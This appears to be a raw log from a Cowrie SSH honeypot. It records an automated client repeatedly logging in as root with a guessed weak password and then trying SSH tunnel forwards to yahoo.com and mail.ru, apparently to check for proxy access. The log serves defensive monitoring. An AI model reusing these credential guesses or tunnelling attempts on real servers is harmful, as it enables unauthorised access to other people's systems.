{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:08.139336Z","src_ip":"77.83.207.83","session":"1ecfbc776295"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":9139,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9139","sensor":"my-vps","timestamp":"2025-08-31T03:54:08.280858Z","session":"1ecfbc776295"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:08.331651Z","src_ip":"77.83.207.83","session":"1ecfbc776295"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:08.382792Z","src_ip":"77.83.207.83","session":"1ecfbc776295"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48003,"dst_ip":"1.2.3.4","dst_port":22,"session":"f377cb654957","protocol":"ssh","message":"New connection: 77.83.207.83:48003 (1.2.3.4:22) [session: f377cb654957]","sensor":"my-vps","timestamp":"2025-08-31T03:54:08.431205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:08.432147Z","src_ip":"77.83.207.83","session":"f377cb654957"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:08.482890Z","src_ip":"77.83.207.83","session":"f377cb654957"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:08.730830Z","src_ip":"77.83.207.83","session":"f377cb654957"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom","message":"login attempt [tom/tom] failed","sensor":"my-vps","timestamp":"2025-08-31T03:54:08.777631Z","src_ip":"212.227.235.229","session":"e2130d27f754"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":31282,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:31282","sensor":"my-vps","timestamp":"2025-08-31T03:54:08.781289Z","session":"f377cb654957"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:08.830956Z","src_ip":"77.83.207.83","session":"f377cb654957"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":19259,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:19259","sensor":"my-vps","timestamp":"2025-08-31T03:54:08.972120Z","session":"f377cb654957"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:09.022155Z","src_ip":"77.83.207.83","session":"f377cb654957"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":26664,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26664","sensor":"my-vps","timestamp":"2025-08-31T03:54:09.164017Z","session":"f377cb654957"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:09.214135Z","src_ip":"77.83.207.83","session":"f377cb654957"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:09.265239Z","src_ip":"77.83.207.83","session":"f377cb654957"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48082,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fb358517cba","protocol":"ssh","message":"New connection: 77.83.207.83:48082 (1.2.3.4:22) [session: 9fb358517cba]","sensor":"my-vps","timestamp":"2025-08-31T03:54:09.315071Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:09.316123Z","src_ip":"77.83.207.83","session":"9fb358517cba"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:09.366457Z","src_ip":"77.83.207.83","session":"9fb358517cba"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:09.617285Z","src_ip":"77.83.207.83","session":"9fb358517cba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22901,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22901","sensor":"my-vps","timestamp":"2025-08-31T03:54:09.668663Z","session":"9fb358517cba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:09.719874Z","src_ip":"77.83.207.83","session":"9fb358517cba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":6774,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:6774","sensor":"my-vps","timestamp":"2025-08-31T03:54:09.860760Z","session":"9fb358517cba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:09.911325Z","src_ip":"77.83.207.83","session":"9fb358517cba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":18358,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:18358","sensor":"my-vps","timestamp":"2025-08-31T03:54:10.052727Z","session":"9fb358517cba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:10.103112Z","src_ip":"77.83.207.83","session":"9fb358517cba"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:10.154179Z","src_ip":"77.83.207.83","session":"9fb358517cba"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48156,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a2cbafae7fc","protocol":"ssh","message":"New connection: 77.83.207.83:48156 (1.2.3.4:22) [session: 0a2cbafae7fc]","sensor":"my-vps","timestamp":"2025-08-31T03:54:10.205945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:10.206975Z","src_ip":"77.83.207.83","session":"0a2cbafae7fc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:10.260389Z","src_ip":"77.83.207.83","session":"0a2cbafae7fc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:10.522093Z","src_ip":"77.83.207.83","session":"0a2cbafae7fc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32068,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:32068","sensor":"my-vps","timestamp":"2025-08-31T03:54:10.575777Z","session":"0a2cbafae7fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:10.628531Z","src_ip":"77.83.207.83","session":"0a2cbafae7fc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":19580,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:19580","sensor":"my-vps","timestamp":"2025-08-31T03:54:10.775108Z","session":"0a2cbafae7fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:10.827736Z","src_ip":"77.83.207.83","session":"0a2cbafae7fc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":11536,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:11536","sensor":"my-vps","timestamp":"2025-08-31T03:54:10.975005Z","session":"0a2cbafae7fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:11.027618Z","src_ip":"77.83.207.83","session":"0a2cbafae7fc"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:11.081827Z","src_ip":"77.83.207.83","session":"0a2cbafae7fc"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48237,"dst_ip":"1.2.3.4","dst_port":22,"session":"f17345c4dcda","protocol":"ssh","message":"New connection: 77.83.207.83:48237 (1.2.3.4:22) [session: f17345c4dcda]","sensor":"my-vps","timestamp":"2025-08-31T03:54:11.133257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:11.134287Z","src_ip":"77.83.207.83","session":"f17345c4dcda"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:11.187114Z","src_ip":"77.83.207.83","session":"f17345c4dcda"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:11.450768Z","src_ip":"77.83.207.83","session":"f17345c4dcda"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11100,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:11100","sensor":"my-vps","timestamp":"2025-08-31T03:54:11.504826Z","session":"f17345c4dcda"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:11.557805Z","src_ip":"77.83.207.83","session":"f17345c4dcda"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":26181,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:26181","sensor":"my-vps","timestamp":"2025-08-31T03:54:11.707157Z","session":"f17345c4dcda"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:11.760297Z","src_ip":"77.83.207.83","session":"f17345c4dcda"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":16699,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:16699","sensor":"my-vps","timestamp":"2025-08-31T03:54:11.907202Z","session":"f17345c4dcda"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:11.960252Z","src_ip":"77.83.207.83","session":"f17345c4dcda"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:12.014060Z","src_ip":"77.83.207.83","session":"f17345c4dcda"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48350,"dst_ip":"1.2.3.4","dst_port":22,"session":"01c4cba6932d","protocol":"ssh","message":"New connection: 77.83.207.83:48350 (1.2.3.4:22) [session: 01c4cba6932d]","sensor":"my-vps","timestamp":"2025-08-31T03:54:12.064562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:12.073725Z","src_ip":"77.83.207.83","session":"01c4cba6932d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:12.115854Z","src_ip":"77.83.207.83","session":"01c4cba6932d"}
